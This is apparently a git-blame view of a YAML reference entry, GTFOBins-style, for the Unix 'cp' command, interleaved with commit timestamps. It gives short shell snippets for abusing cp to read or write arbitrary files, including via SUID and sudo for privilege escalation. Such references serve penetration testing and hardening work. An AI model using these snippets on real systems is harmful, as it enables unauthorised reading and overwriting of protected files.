2018-09-03 22:33:24 +02:00
|
|
|
---
|
|
|
|
functions:
|
2020-03-21 19:14:56 +01:00
|
|
|
file-read:
|
2018-09-03 22:33:24 +02:00
|
|
|
- code: |
|
2020-03-21 19:14:56 +01:00
|
|
|
LFILE=file_to_read
|
|
|
|
cp "$LFILE" /dev/stdout
|
2020-03-21 19:24:30 +01:00
|
|
|
file-write:
|
|
|
|
- code: |
|
|
|
|
LFILE=file_to_write
|
|
|
|
echo "DATA" | cp /dev/stdin "$LFILE"
|
2020-03-21 19:14:56 +01:00
|
|
|
suid:
|
2020-03-21 19:24:30 +01:00
|
|
|
- code: |
|
|
|
|
LFILE=file_to_write
|
|
|
|
echo "DATA" | ./cp /dev/stdin "$LFILE"
|
2020-03-21 19:14:56 +01:00
|
|
|
- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
|
|
|
|
code: |
|
2018-09-03 22:33:24 +02:00
|
|
|
LFILE=file_to_write
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo "DATA" > $TF
|
|
|
|
./cp $TF $LFILE
|
2018-10-05 19:55:38 +02:00
|
|
|
sudo:
|
2020-03-21 19:24:30 +01:00
|
|
|
- code: |
|
|
|
|
LFILE=file_to_write
|
|
|
|
echo "DATA" | sudo cp /dev/stdin "$LFILE"
|
2020-03-21 19:14:56 +01:00
|
|
|
- description: This can be used to copy and then read or write files from a restricted file systems or with elevated privileges.
|
|
|
|
code: |
|
2018-09-03 22:33:24 +02:00
|
|
|
LFILE=file_to_write
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo "DATA" > $TF
|
|
|
|
sudo cp $TF $LFILE
|
|
|
|
---
|